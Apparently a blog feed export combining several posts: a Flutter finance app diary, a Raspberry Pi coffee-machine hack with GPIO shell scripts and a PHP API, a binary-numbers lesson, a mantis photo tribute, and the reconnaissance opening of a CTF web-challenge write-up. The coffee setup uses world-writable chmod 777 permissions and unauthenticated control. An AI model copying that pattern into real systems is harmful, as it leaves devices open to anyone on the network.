daniel biegler devblog flutter app thumbnail

What pushed me over the edge to start this

Maybe some of you know that this year (2019) I started my stock trading journey, so I began using a couple of different finance apps to easily catch up on news and my watchlist, quickly look up prices for different instruments, you get the idea.

In the beginning this was enough for me; I was only getting started, so I didn't exactly know what I wanted to know, what I wanted to see, or how I wanted to interact with all the information.

Soon I'll have been trading for a whole year, and I already know a lot more than in the beginning.

Now I want things, I expect things and I wish for things from my tools.

Like I said, I tried out a couple of different apps, narrowed them down and ended up using the Finanzen.net app as my daily driver. And before I continue I'd like to mention that the devs working on that app are probably really nice people and I hold no grudge against them personally.

Here it goes: I am greatly dissatisfied with the app's performance - so much so, in fact, that it genuinely was the straw that broke the camel's back.

Freezes, bugs, bad user experience, oh boy countless bugs, missing functionality, more bugs, weird behaviour and last but not least.. the bugs - did I mention those?

Like I said, I do not intend to shit on individual devs, but that app is currently in such a state that I don't want to use it anymore.

So I set out to prove to myself that I could do better.

Developing an app - where to start?

So the first step is to prove to myself that I can do it. I like to break such a problem down to an MVP or MVE, "Minimum Viable Product" or "Minimum Viable Experiment" respectively.

If you've ever thought about making a product, you know that feeling of having a million ideas for features and stuff you want to have, but this more often than not culminates in a half-baked project that gets abandoned halfway through because you don't make much progress and lose interest. (Been there, done that..)

iamdevloper screenshot dead side projects

I found that the key for me is to strive for a Minimum Viable Experiment.

Add all the stuff you think about to a backlog and strip it down to the most essential pieces, the core features that you need - not the ones you want. This is key. It helps you focus and get something out the door. Don't spend time, or at least not much time, on design. Make it work. A product that looks wonky but works still provides some value. A product that looks amazing but doesn't work is worthless.

Making the first prototype

I dove into Dart and Flutter instead of native Android development because I'd like to have the option to also release on iOS from the same codebase. I'd seen some conference talks about Flutter and it looked quite intriguing.

Read up on documentation, watch some tutorials, write code, read documentation, write some more code, watch some more tutorials, .. repeat over and over and then I got this:

daniel biegler devblog flutter app first screenshot

The funny thing here is.. nothing worked, haha. The displayed text is hardcoded because I was still learning how to display anything on the screen. The button just displays the predefined text, that's it.

I decided that I would probably need three or four "Pages", so to speak.

  • A dashboard for news, some sort of general analytics and the like
  • A search page so that I can look up securities
  • A place where I get detailed info about a security
  • A watchlist page where I can save securities to and look them up later

Next, I needed a way to search for securities, so I looked at several APIs and websites that provide that functionality. I narrowed multiple possibilities down to the REST API of Börse Frankfurt because it is a very well-made site that responds with very easily parseable JSON.

As an example, if you search for 'test' they respond with objects that look like this:

{
  "isin":"GB0031638363",
  "wkn":null,
  "symbol":null,
  "investmentCompany":null,
  "issuer":null,
  "type":"EQUITY",
  "typeName":{
    "originalValue":"EQUITY",
    "translations":{
      "de":"Aktie",
      "en":"Equity"
    }
  },
  "count":0,
  "name":{
    "originalValue":"INTERTEK GROUP     LS-,01",
    "translations":{
      "others":"Intertek Testing Services PLC"
    }
  }
}

Super duper comfortable to work with, hats off to you Börse Frankfurt.

Some tinkering later I got the very first search working:

daniel biegler devblog flutter app first search

Next, I made the results into a list so that I can scroll down properly:

daniel biegler devblog flutter app first listview

I created a local SQLite database that holds a couple of tables. For example, I store some search data, securities and watchlist items. Then I made it possible to save and display items in said watchlist:

daniel biegler devblog flutter app first dialog daniel biegler devblog flutter app first watchlist

After that came some dynamically generated info when you look up a specific security:

daniel biegler devblog flutter app first security

You see that slider element under the chart? It lets you configure which chart you see, from intraday to one week, all the way up to ten years. That chart and slider are currently sort of just a placeholder before I implement a proper interactive chart.

In the name of prototyping quickly: charts are currently just images that are fetched from an API. Ultimately I'd like to implement charts where you can zoom in/out and that show some very basic indicators. No actual trading will get done from the app, so it doesn't have to be very comprehensive, but I'd like to have some basic ones.

Then I cleaned up the watchlist so that you get some useful data out of it:

daniel biegler devblog flutter app updated watchlist

It starts to look like something actually usable, eh?

I added the difference to the last trading day so you can spot harsh changes. On the left you can see the previous trading day and the difference in absolute and percentage values. On the right you can see how much your position is currently worth.

daniel biegler devblog flutter app watchlist daily difference

And with that shown, you now know the current state of my app.

  • Search for securities
  • Get some info about them
  • Save them to a watchlist

It works pretty well so far, so I think I have proven to myself that I am indeed capable of solving my needs and fulfilling my dream of making a (good) app. It is super simple but serves its purpose of being a rough, minimum viable experiment!

Problems

The more I laid out the structure and architecture of the app, the harder I found it to get a really good overview of the big picture, and I found the way data flows in Flutter pretty confusing. I relied heavily on Streams and the BLoC pattern, but that introduced many headaches you need to think about and left a bad taste in my mouth. Everything is so disjointed (which can be a good thing), but I found myself writing so much boilerplate code and spending way too much time thinking about how to work around the streams instead of working on the logic of my app that I got frustrated in the end.

Don't get me wrong though, Streams are a cool concept and I see the value in them. In hindsight I'd build the app in a different way, though. I think it'd be considerably easier with a single source of truth like a Redux store.

This is why next time you're in for a treat! We're gonna get technical.

What's next

Please keep in mind that this article series is just for fun and won't be receiving consistent updates. It'll probably be quite a while until the next installment.

I generally plan to release posts after I've fixed some bugs, improved the code and implemented something new that's worth showing. This ensures that every post is interesting on its own, instead of being a little update that no one really cares about. For this post I left pretty much all of the technical details out and didn't show code. I think I want to change that up next time. Ready yourselves to dive into some code ;)

Did you enjoy this?

Please reach out and tell me what you think. Would you like to see more, would you like to see something implemented or are you interested in something specific?

Thanks for your time, cheers.

- Daniel Biegler

How to hack your coffee machine to serve you via WiFi
Tue, 02 Jul 2019


Here's the end result:

Here's how it works:

daniel biegler coffee wifi control diagram


Hardware used / What you need

  • Raspberry Pi Zero W
    • I personally used a Raspberry Pi Zero with a Wi-Fi USB dongle. I'd recommend the Raspberry Pi Zero W though.
  • Wires
  • Relay Board/s
  • Soldering iron
  • Optional:
    • Mechanical Switch
    • Power Socket
    • Drill

Step 1:
Decide on functionality

For starters, unscrew your machine and find out how the buttons interact with the main circuit board.

Here you can see that the buttons in the front feed the main circuit board with information via these connections:

daniel biegler coffee wifi buttons to mainboard

Behold the front i.e. the user interface

daniel biegler coffee wifi machine front

The whole theory for this project is that we're going to programmatically press buttons.

With hardware, you have a physical button, which looks like this

daniel biegler coffee wifi switch button

When you press the button down, you close the circuit which enables the charge to move.

This is cool, because simply adding another "button" is all we need, see here

daniel biegler coffee wifi switch button and relay

This way it doesn't matter which button you're pressing, be it the physical button on the machine or our future digital "button"; both buttons may complete the circuit!

This second "button" will be our relay board.

For this project, I decided that I'm only interested in controlling the following three buttons:

  • On/Off
  • Brew one cup
  • Brew two cups

Decide for yourself what kind of functionality you're interested in.

Step 2:
Identify which connections need soldering

I decided that this is a step I should take early on to rule out possible problems with the board. The connections might be obstructed by hot glue for example.

daniel biegler coffee wifi machine UI board back

Turn the user interface board around and identify the specific lanes.

daniel biegler coffee wifi machine UI board front

After some tracing, I identified all the info I needed: one wire to each colored line plus one for ground (GND).

daniel biegler coffee wifi machine UI board back annotated

Notice how the three buttons are connected to the same GND, the black line. This means we only need a single wire for the GND instead of wiring up each button individually, cool!

Step 3:
Figure out how a relay board works

A relay is basically just an electrically operated switch.

Let charge move through a control pin and the switch flips. Here's a short video, made by Simon A. Eugster

If we connect such a relay to a button on our coffee machine, we can electrically control it!

Step 4:
Figure out how to control the relay board

The Raspberry Pi has these so-called general purpose input/output pins (GPIO pins for short).

They look like this:

daniel biegler coffee wifi raspberry pi gpio pins

We're going to use the output pins on our Pi to electrically control the relay, which will then control the coffee machine. Remember the diagram from the beginning:

daniel biegler coffee wifi control diagram

How do we interact with a GPIO pin?

The Raspberry Pi is running Linux, which means "everything is a file"; in other words, you can control the GPIO pins simply by writing to a file. Don't worry, I published my code and will walk you through it. More on the specifics later.

How do we tell the Pi when to flip the pin (relay)?

I came up with a simple REST API, which means that the Pi will be waiting for specific network requests and act accordingly, either doing what it's told or reporting back an error.

Three buttons want to be controlled, so the Pi will be listening for these three instructions:

Command        Action
cups=1         Brew 1 cup.
cups=2         Brew 2 cups.
power=toggle   Toggle power.
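
For illustration, such a request could look like this; the host and path here are placeholders for wherever the Pi's endpoint actually lives:

$ curl --data "cups=1" "http://raspberrypi.local/coffee/api.php"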

Having such an interface makes it possible to create multiple different ways of interacting with the Pi; meaning, any device that can send network requests (your desktop, laptop, tablet, phone, watch, ..) lets you interact with the coffee machine!

How do we send a network request?

I found building a little website the most intuitive approach for interaction, since that way other people in my network can use this service too. You could decide on something different here.
(Scripting comes to mind)
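
For example, a button on such a page could fire the request with a few lines of JavaScript. This is just a sketch; the endpoint is a placeholder and the parameter follows the table above:

// Sketch: tell the Pi to brew one cup from the browser.
fetch('api.php', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: 'cups=1'
})
  .then((response) => response.text())
  .then((text) => console.log('Coffee machine says:', text))
  .catch((err) => console.error('Request failed:', err));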

Step 5
Decide where to put the Pi

Your Pi has to reside either in or outside of the coffee machine. I opened up the back and luckily found plenty of space to work with. 

daniel biegler coffee wifi machine back

I do not own a case for the Pi so some sort of backplate would be nice to have. Some plastic from the basement will do. Drill some holes, turn some screws et voilà:

daniel biegler coffee wifi raspberry pi on backplate

Sticking it onto the back wall seemed reasonable enough:

daniel biegler coffee wifi machine inside

Step 6:
Begin soldering

Relay boards generally need a pin for power (VCC), another pin for ground (GND) and one pin for each channel. I want to control three buttons so I need five pins in total. I marked them here:

daniel biegler coffee wifi relay board used pins crop

Here are the pins that I used

daniel biegler coffee wifi raspberry pi used pins

After soldering and powering up your Pi, it should look similar to this:

daniel biegler coffee wifi raspberry pi soldered to relays

Notice the three shining LEDs; they indicate the state of the relays. The relays are ON by default and have to be turned OFF after booting the Pi. This task will be automated via a startup script; more on that later.

Sidenote:
At this point in the project everything was new to me, so I tried toggling the relays manually. For this tutorial I'll be getting into the technical stuff later on. If you're familiar with Bash and already want to play around with it, consult my initialization script.
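
To give you a rough idea, such an initialization boils down to something like the following sketch. The pin numbers are placeholders and I'm assuming active-low relays, where writing a 1 switches the relay OFF; consult the repository for the real script:

#!/bin/bash
# Export the relay pins, configure them as outputs and pull them HIGH,
# which switches active-low relays OFF. Run once after boot (as root).
for pin in 5 6 13; do
  echo "$pin" > /sys/class/gpio/export
  echo "out"  > /sys/class/gpio/gpio$pin/direction
  echo "1"    > /sys/class/gpio/gpio$pin/value
done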

The Pi's done, on to the coffee machine.

Remember the traced board:

daniel biegler coffee wifi machine UI board back annotated

After soldering it should look similar to this:

daniel biegler coffee wifi machine UI board back soldered

Cool, progress! You may need to extend your wires depending on how big your coffee machine is. Mine reach from the front to the back like so:

daniel biegler coffee wifi machine extended wires

Depending on how you want to provide power to your Pi you might be done soldering now!

My father suggested that you could use the same power that drives the coffee machine to also power the Pi. This way no external cable would be visible, which is pretty neat if you ask me!

WARNING: Working with such high voltages is dangerous. Only attempt this if you truly know what you're doing!

We put a small power socket inside the coffee machine which holds a run-of-the-mill AC-to-DC USB adapter. This adapter then powers the Pi via USB. See here:

daniel biegler coffee wifi machine ac dc usb adapter

To be able to turn the Pi ON or OFF, a little mechanical switch was used. The white socket has two cables coming out of it. One of them needs to go into the mechanical switch and the other one into the coffee machine.

Identify where the machine draws power from by looking for what will probably be a brown, a blue and a yellow-green cable. (Check the colours for your region; these colours are only true for Europe!)

Connect the power socket cables to the brown and blue cable like in the following image. It doesn't matter which specific cable of the power socket goes into the blue or brown one.

daniel biegler coffee wifi power socket cables labeled

Cut a hole for the switch and enjoy the hidden goodness.

daniel biegler coffee wifi mechanical switch

Step 7
Setup needed software

Note:
All my code for this project can be found here.

I coded the aforementioned REST API in some basic PHP, because a webserver with PHP support was already installed on my Pi.

For the webserver (plus PHP) you have a couple of options to choose from; there are neat little articles from the Raspberry Pi Foundation itself. It really doesn't matter which one you choose, just pick one. For example you could go for NGINX or Apache. The process is pretty much the same either way and a "set-it-and-forget-it" step.

Download and install, enable some stuff, done.

How exactly do we control the GPIO pins

The pins are represented as files on your Pi. You can find them in the /sys/class/gpio folder, see here:

$ ls /sys/class/gpio
export  gpiochip0  unexport

This folder is pretty interesting, in that there are two special files, export and unexport

The export file sets up and enables the files of a specific pin.
The unexport file removes the created files.

A little example will help make clear how this works: You simply write the number of the GPIO pin into the export file, then you get access to the needed files. The only caveat is that by default you need root privileges because this is a system directory. For example I want to activate the 5th GPIO pin so I write the number 5 into export:

$ echo 5 > export
$ ls /sys/class/gpio
export  gpio5  gpiochip0  unexport

See how now there's an additional folder called gpio5! You can go inside and list its content via:

$ cd /sys/class/gpio/gpio5
$ ls
active_low  device  direction  edge  power  subsystem  uevent  value

Here are more special files that let you configure this pin. For us direction and value are interesting because with those two we could start controlling our relay! Inspect the contents of the files via:

$ cat direction value
in
1

The current direction of this pin points in and its value is 1. Imagine hooking up an external device to this pin, this way you could establish communication between different systems by monitoring the value. Cool, right?

Our goal is to output charge to the relay, so we have to change the direction from in to out.

Simply write out to the direction file like so:

$ echo out > direction
$ cat direction value
out
0

See now the pin points outwards and has a value of 0. Super simple stuff. I was quite delighted when I tried this out for the first time because I had assumed that controlling hardware would be very finicky. All that's needed is simply writing either 1 or 0 to the value file. Who knew?
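Just to illustrate the file interface in a few lines of Python (my own sketch, not part of the project code): since a relay "presses" a button, turning the pin on and shortly afterwards off again behaves like a quick button press. This assumes the pin is already exported, set to out and writable, and that the relay board switches on a low signal, which matches the init script further down, where writing 1 turns the relays off.

import time

VALUE_FILE = "/sys/class/gpio/gpio5/value"  # sticking with the example pin from above

def press_button(hold_seconds=0.5):
    with open(VALUE_FILE, "w") as f:
        f.write("0")              # energize the relay: the "button" is now pressed
    time.sleep(hold_seconds)      # hold it for a moment
    with open(VALUE_FILE, "w") as f:
        f.write("1")              # release the relay again

press_button()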

A little sidenote:
A distinction has to be made here, the export and unexport files expect not the literal pin number, but the GPIO pin number which is different. Let's stick to the example of GPIO pin number 5. On the following graphic you can see that the GPIO5 has the literal pin number of 29.


daniel biegler coffee wifi raspberry pi used pins

So yeah, keep that in mind. 


Setup the GPIO pins we need

Like you've seen in the previous graphic I intend to use the GPIO pins 2, 3 and 4. 
I wrote a script that does the steps of exporting, setting the direction, setting the value and permissions:

#!/bin/bash

# Enable the needed pins.
echo 2 > '/sys/class/gpio/export';
echo 3 > '/sys/class/gpio/export';
echo 4 > '/sys/class/gpio/export';

# Change directions to "out".
echo 'out' > '/sys/class/gpio/gpio2/direction';
echo 'out' > '/sys/class/gpio/gpio3/direction';
echo 'out' > '/sys/class/gpio/gpio4/direction';

# Turn the pins off. (The relay board is active-low: writing 1 de-energizes the relays.)
echo 1 > '/sys/class/gpio/gpio2/value';
echo 1 > '/sys/class/gpio/gpio3/value';
echo 1 > '/sys/class/gpio/gpio4/value';

# Change permissions so the webserver can write to the 'value'-files
chmod 777 '/sys/class/gpio/gpio2/value';
chmod 777 '/sys/class/gpio/gpio3/value';
chmod 777 '/sys/class/gpio/gpio4/value';

A reboot of the Pi resets the pins we previously exported so we need a startup service that re-enables them after booting up. I wrote this service which will run the initialization-script:

[Unit]
Description=Sets up the necessary files and permissions for the 2nd, 3rd, 4th GPIO pins to work.

[Service]
Type=oneshot
ExecStart=/bin/gpio_coffee_init.sh

[Install]
WantedBy=multi-user.target

Please notice how the service looks for the initialization script in the /bin folder /bin/gpio_coffee_init.sh. So prior to enabling this service you should move the gpio_coffee_init.sh into /bin via:

$ mv gpio_coffee_init.sh /bin

Then I also moved the service into /etc/systemd/system the same way via:

$ mv gpio_coffee_init.service /etc/systemd/system

After doing that you can try out if it works by starting the service via:

$ systemctl start gpio_coffee_init.service

This should set your GPIO pins up which you can check manually in the /sys/class/gpio directory, like so:

$ ls /sys/class/gpio
export  gpio2  gpio3  gpio4  gpiochip0  unexport

See how the second, third and fourth pins got exported. Yay. If that's successful you can enable the service, which means it'll run on each startup of the Pi.

$ systemctl enable gpio_coffee_init.service

A quick recap

  • We have an initialization script which properly sets our pins up: Export them, setup direction, value and file permissions.
  • This initialization script gets automatically run after booting up the Pi.

I did this once and after months of use I never had the need to change anything here. It just works.™

Deploy the website

Alright, we got the hardware stuff out of the way. Time to deploy the website.

The website files will probably reside in /var/www/html for you. This folder depends on your Linux distro though; mine, for example, are in /srv/http. It doesn't really matter, just find out where your server looks for files via your search engine of choice.

You can find the code of my site here. Download it and move the index.php and the vendor folder to the directory where your webserver looks for pages. The index.php file contains the actual website and the vendor folder contains the 'graphics', so to speak. If you forget to also move the vendor folder, the site will look bare-bones and broken.

Sidenote:
I don't think it's necessary here to go through all of the site's code, is it? Shoot me a comment if you think otherwise.

I designed the site to be minimalistic and optimized for mobile displays. It should look like this when you open it in your browser:

daniel biegler coffee wifi website ui

Last but not least two little tricks to improve the quality of life when using this service:

You could change the device name of your Pi to something like 'coffee' so that you can access it more easily inside your home network. For example, my FRITZ!Box router allows me to connect to devices inside my network via URLs like <devicename>.fritz.box, which in this case makes connecting really convenient via coffee.fritz.box.

In order to do this you simply write the name you want into the hostname file at /etc/hostname like so:

$ echo 'coffee' > /etc/hostname

Another cool little tip is that you could add this site to your homescreen. This way you can access your coffee with one simple tap on the icon. Chrome, Firefox and Safari all support this feature, find it in the settings while visiting a site.

The website in action

Assuming the software works as expected: finally, the magical moment of putting it all together is around the corner.

Step 8
Connecting coffee machine to relay

Connecting the relay to the coffee machine is easily done, here's a little diagram I made:

daniel biegler coffee wifi wiring relay diagram

In reality it looks something like this:

daniel biegler coffee wifi wiring relay

You should be done now.

Now your next coffee is only a click away!

For completeness' sake, take another look at the abstract diagram

daniel biegler coffee wifi control diagram

and feel the pure bliss of operating a heavy machine with your fingertips:

Closing words

Thank you for reading through this mess. It's been my first hardware project and needed a lot of tinkering, trial and error. Looking back, it all seemed really daunting at first, but I enjoyed the road.

If you enjoyed this post, subscribing to my mailing list might be of interest to you. How about reading more, for example about visualizing DNA?

Join the discussion about this post on Reddit!

]]>
Learn Interactively: Binary Code https://www.danielbiegler.de/blog/learn-interactively-binary-code/ https://www.danielbiegler.de/blog/learn-interactively-binary-code/#comments Tue, 21 May 2019 15:41:00 +0000 learn interactive binary learn-interactively numeral-system https://www.danielbiegler.de/blog/learn-interactively-binary-code/ Weiterlesen

]]>

To understand how binary code works, you can look at its big brother first: the decimal system.

We defined ten specific symbols to denote values.

9 8 7 6 5 4 3 2 1 0
You know this, easy enough.


But now think about how counting works. I hear you instinctively mumble 1, 2, 3, .. inside your head but let's define that a little more verbosely.

By "counting up" we mean incrementing a value by one unit.

(Interactive counters on the original page, showing the values 0 and 9.)

By "counting down" we mean decrementing a value by one unit.

Alright, we can count now.

Exciting, I know!

That's great and all, but that's not enough. We need a mechanism for dealing with values higher than our highest symbol, because inventing new symbols for every single value is not practical.

From experience, you already know how to count into the two digit range but what exactly happens there? Again, let's be a little verbose and generic.

When you reach the highest possible symbol, wrap back around to the lowest symbol and increment the digit to your left.

(Interactive counter on the original page: go ahead and press the +1 button; text describing each step gets generated.)

I know that you know this, but really think about how the number grows, step by step.

I specifically tried to word this whole process as general as possible, so we can reuse it later when counting in binary. Before we do that however, let's take a smaller step.

Let's push the first boundary of our mind. Take a mental snapshot. 

What would change if we'd remove the symbol '9' from our currently used numeral system?

Without '9' we are left with:

8 7 6 5 4 3 2 1 0
Easy enough, right?

Remember how we previously counted, let's do it again. 

(Interactive counter on the original page: press the +1 button and count without the symbol '9'.)

You should feel weird now, given you've never done this before. If you grasp this concept however, you can count in pretty much any numeral system (including binary)!



Let's translate some numbers from this nonary (9 digits) numeral system to the more familiar decimal system.

(Interactive side-by-side counters on the original page: one Nonary, one Decimal, both starting at 0.)

Compare how the numbers grow. Hammer this point home:
When you reach the highest possible symbol, wrap back around to the lowest symbol and increment the digit to your left. See how this process works exactly the same for both systems.
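If you happen to know a little Python, here's a tiny sketch of that exact wrap-and-carry rule (my own addition, not part of the interactive page); it works for any base, be it ten, nine or two:

def count_up(digits, base):
    # 'digits' is a list like [0, 8], leftmost digit first.
    i = len(digits) - 1
    while i >= 0:
        if digits[i] < base - 1:
            digits[i] += 1      # there's room left: simply count this digit up
            return digits
        digits[i] = 0           # highest symbol reached: wrap back around...
        i -= 1                  # ...and increment the digit to the left
    return [1] + digits         # every digit wrapped around: a new digit appears

print(count_up([0, 8], 10))     # [0, 9]  - decimal still has room
print(count_up([0, 8], 9))      # [1, 0]  - in nonary, 8 is the highest symbol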

We managed to reduce the number of possible symbols from ten to nine. It's time to reduce them even more, you're here to learn binary after all. 

Go through the next examples thoughtfully and try to think of how the numbers will look - before - you change the value. 

Symbols   Name         Value
5         Quinary      0
4         Quaternary   0
3         Ternary      0
10        Decimal      0

(Interactive counters on the original page; each row counts up in its own numeral system.)


By now, you should know why the numbers look the way they do. We're only one digit away from binary, are you ready?

Remember, this process works exactly the same way in binary; You just reach the highest symbol very quickly, so you need to wrap around really quickly as well.

Let's count the first three digits together, step by step.

Decimal   000
Binary    000

(Interactive side-by-side counters on the original page: press +1 and both count up together.)

We increment the rightmost digit by one unit, until we reach the highest symbol.

Practice: Small Numbers

Here are some numbers which you should try to translate, to check if you understood the material. Use anything (your mind, your fingers, paper or even the textbox itself) to keep track of the numbers.

Quick note: No leading zeros are needed!

(Interactive exercise on the original page: decimal numbers are shown and you fill in the binary equivalent.)


How to easily convert binary to decimal in your head

You've seen how counting works and the general concept behind binary, but it's probably still a bit foreign because counting to, for example, 22 is tedious and unintuitive.

Luckily, there's a really convenient property of the binary numeral system which you can use in your head!

Let's stick to the chosen example of the decimal number 22.

Create a sequence, or rather, table of numbers that equate to powers of two. It's considerably less scary than it sounds once you see it visually. Most people can deduce the missing number in the following sequence:






? 8 4 2 1

So far so good, now to the good part. 

When you put a binary table beneath said sequence, you can simply add up all the numbers with a 1 underneath them.

Let's say that we have decimal numbers up to 16 i.e.

16 8 4 2 1

and we want to translate the following binary number: 10110
This results in the following table:

Decimal   16    8    4    2    1      Sum: 22
Binary     1    0    1    1    0




Another example. This time 1011:

Decimal   16    8    4    2    1      Sum: 11
Binary     0    1    0    1    1




Here's an interactive table to see it in action.

(Interactive table on the original page: toggle the binary digits underneath 16, 8, 4, 2 and 1, and the decimal sum updates automatically.)
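If you prefer seeing the "add up the columns with a 1 underneath them" idea as code, here's a small Python sketch (my own addition, purely for illustration):

def binary_to_decimal(bits):
    total = 0
    column = 1                    # the rightmost column is worth 1
    for bit in reversed(bits):    # walk the columns from right to left
        if bit == "1":
            total += column       # a 1 underneath: add the column's value
        column *= 2               # the next column to the left is worth twice as much
    return total

print(binary_to_decimal("10110"))  # 22
print(binary_to_decimal("1011"))   # 11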







Process: Head conversion

The thought process when trying to translate a decimal number to binary is easiest performed from left to right. Let's say that we want to find the binary number for '19'.

Start with the largest power-of-two-number that will fit in.

32? No, too big.
The next smaller one; 16? Yes, a match!
Put a '1' down and construct the table, left to right.

Decimal   16    8    4    2    1      Sum so far: 16
Binary     1




Your goal now is to find the numbers that add up to '19'. There are a few ways; my personal thought process works like this:

Now (19-16) equals 3, so we try to match 3 going forward.

The next smaller one; Does 8 fit into 3? No, 8 is bigger than 3.
Put a '0' down.

Decimal   16    8    4    2    1      Sum so far: 16
Binary     1    0




The next smaller one; Does 4 fit into 3? No, 4 is bigger than 3.
Put a '0' down.

Decimal   16    8    4    2    1      Sum so far: 16
Binary     1    0    0




The next smaller one; Does 2 fit into 3? Yes! 2 is smaller than 3.
Going forward we're trying to match 1 now, because (3-2) equals 1.
Put a '1' down.

Decimal   16    8    4    2    1      Sum so far: 18
Binary     1    0    0    1




The next smaller one; Does 1 fit into 1? Yes (of course), we're done.
Put a '1' down.

Decimal   16    8    4    2    1      Sum: 19
Binary     1    0    0    1    1




Do this a couple of times and it will become easier.
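The same left-to-right thought process can also be written down as a short Python sketch (again just my own illustration, not part of the interactive page):

def decimal_to_binary(number):
    # Start with the largest power of two that fits into the number.
    column = 1
    while column * 2 <= number:
        column *= 2

    bits = ""
    while column >= 1:
        if column <= number:      # it fits: put a '1' down and subtract it
            bits += "1"
            number -= column
        else:                     # too big: put a '0' down
            bits += "0"
        column //= 2              # move one column to the right
    return bits

print(decimal_to_binary(19))  # 10011
print(decimal_to_binary(22))  # 10110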

Equipped with your new knowledge and some practice you should be able to decipher larger binary numbers! Here's a similar exercise to the one before, but with bigger numbers:

Quick note: No leading zeros are needed!

(Interactive exercise on the original page: larger decimal numbers to translate into binary.)


Afterword

Thank you very much for reading!

If you're not quite getting it, please let me know where you got stuck.

My main goal with this post is helping you understand how our numeral systems work. If you understood the material, you should be able to count in other bases as well. For example, I mentioned Ternary (base 3), which has real world use cases like expressing the state of CMOS circuits (and more).

There's also hexadecimal (base 16), which is very widely used in computers for displaying many different kinds of values, including color references, IP addresses, text, etc.

Please let me know if you enjoyed this article, I'm always looking for feedback to improve upon.

]]>
Mantis Matilda https://www.danielbiegler.de/blog/mantis-matilda/ https://www.danielbiegler.de/blog/mantis-matilda/#comments Tue, 21 May 2019 15:00:00 +0000 mantis matilda insect portrait photography https://www.danielbiegler.de/blog/mantis-matilda/ Weiterlesen

]]>
It feels to me that there's this odd, specific elegance to the cold, calculated, silent stare of a praying mantis. 

What is it thinking? To what level is it assessing the situation, reasoning?

daniel biegler matilda portrait roses head crop

An opaque gaze that feels approaching yet distanced, looming, scheming and yet - indifferent. It seems as though you are of no concern to the mantis. It's not judging, it's only observing and deciding to let the thoughts pass.

The head shape and big eyes can sometimes fool you into thinking that the mantis is 'smiling' but that is just us humans interpreting signals that aren't applicable to these wonderful creatures. The 'facial' expression stays the same, no matter the situation. 

daniel biegler matilda portrait upside down

I've always loved insect shots but never had the means to take the picture that I had in my mind. After a long time of studying, deliberating and saving money I finally bit the bullet and bought a used DSLR. I can't afford a true macro lens as of yet, but I got the Tamron 70-300mm for a cheap 99€ (~$110 USD).

My end goal is to be able to shoot like Andres Moline, his work is incredible. Comparing yourself with such a highly skilled artist can be a trap because it's pretty discouraging seeing the masterpieces they produce while yours lack substance.

Knowing that, I'm trying to enjoy the road, not the destination.

And this is exactly why this picture of Matilda feels so special to me.

Taking the leap and trying to put yourself out there, knowing you might fail and regret doing so is a hurdle that I wanted to overcome. The following image of Matilda is my very first genuine attempt at that.

daniel biegler matilda portrait small

I tried to capture the curious yet neutral expression of Matilda.
This post is my tribute to her.

About Matilda

This beautiful creature lived beside me on my ficus for over a year; I raised her from when she was this tiny:

daniel biegler matilda first photo

It's the very first picture I took of her on my habanero chili plant.

Don't be fooled by her fragile looks though, she is brave and doesn't back down!

daniel biegler matilda first meal locust

Before I got the picture that I wanted, I practiced other shots of her which led to her gathering some fans on reddit, more specifically the awwnverts community.

daniel biegler matilda reddit posts

Thank you to everyone that commented and spread the love! It was genuinely appreciated, because bringing people joy is the goal I set for my art.

I hope in the future I'm able to look back on this canvas and tell myself that my journey started here.

daniel biegler holding matilda on canvas

Matilda got very old, approximately 16 months, and died peacefully of old age.

I buried her in the soil of the first plant that she lived on.
Farewell, little one. ❤

Mantis Matilda 
† 17.05.19

]]>
Troopers FUCSS CTF 2018 Writeup https://www.danielbiegler.de/blog/troopers-fucss-ctf-2018-writeup/ https://www.danielbiegler.de/blog/troopers-fucss-ctf-2018-writeup/#comments Tue, 04 Dec 2018 00:00:00 +0000 english fucss fishbowl troopers security web writeup ctf 2018 18 exploit infosec https://www.danielbiegler.de/blog/troopers-fucss-ctf-2018-writeup/ Weiterlesen

]]>

On the first of October 2018 the TROOPERS Conference tweeted this.

In short, TROOPERS generously give away a couple of free tickets to students that submit a motivational letter. 

This year however, they added an additional technical challenge which features two missions.

Since I'd LOVE to go, I decided to polish my motivational letter with this writeup.


# How I solved the challenges

# 1. Access Denied

During his development on the custom DBMS and secret investigations, our insider intern figured that the performance issues might have some security impact on the web interfaces authentication as well. Since said entity is rather sloppy with their access controls we found an internet facing web interface. Go over to db.f••••••l.tech and see if you can gain access to the application.

# Reconnaissance

Let's have a look, open the target site.

daniel biegler fucss index

Alright, nothing much to see from the outside.
A very useful thing to check for is the so called robots.txt. This is a convenient standard for telling web robots where to and where not to look. 

Not all robots cooperate with the standard; email harvesters, spambots, malware, and robots that scan for security vulnerabilities may even start with the portions of the website where they have been told to stay out. 

Source: en.wikipedia.org, as of 2018-10-05

For this we just append /robots.txt to the url. 

User-agent: *
Allow: /humans.txt
Disallow: /

User-agent: Evil Imp/3.7
Allow: /login/
Allow: /admin/
Allow: /api/
Disallow: /

Something we can work with, nice. 

While this is the "Robots exclusion standard", there's also an "inclusion standard" called Sitemaps. Those provide web robots with information on where to look for content. Earlier we saw that the robots.txt specifically disallows everything except for the /humans.txt; nonetheless, it's always worth looking at the Sitemap.

daniel biegler fucss 404

Nevermind.

So let's take a look at the /humans.txt, the authors maybe dropped a hint there:

this NONSENSE is brought to you by
@hnzlmnn and @talynrae

Well. Maybe a hint, maybe not. /shrug

(either way, give 'em a nice tweet for creating these awesome challenges, will ya?)

Alright, before we continue with the disallowed sites from the robots.txt, let's investigate the root page first.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta content="IE=edge" http-equiv="X-UA-Compatible" />
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <title>FishBowl 0day Database</title>
    <link rel="stylesheet" href="/static/css/main.css" />
  </head>
  <body class="">
    <div class="grid-wrap main-content">
      <section class="page">
        <div class="page-content">
          <div id="maintenance">
            <h2>Maintenance!</h2>
            <p>
              Maintenance mode has been activated.<br />
              Use the administrative interface to disable it.
            </p>
          </div>
        </div>
      </section>
    </div>
    <div class="grid-wrap">
      <header class="site-footer">
        <div class="wrapper">
          <a class="logo" href="/">
          <img alt="LOGO" src="/static/images/logo.svg" />
          <span>Fishbowl</span>
          </a>
        </div>
      </header>
    </div>
  </body>
</html>

Very concise, no comments that could help us, no JavaScript either. The only external thing is the CSS file. I won't post it here since it isn't as short as the HTML, but at first glance it doesn't hold any interesting information either - except for these two parts:

#registration-form {
  font-family: "Source Sans Pro", "Helvetica Neue", "Helvetica", sans-serif;
  width: 400px;
  min-width: 250px;
  margin: 20px auto;
  position: relative;
  border-radius: 2px;
  overflow: hidden;
}
#registration-form:after {
  ...

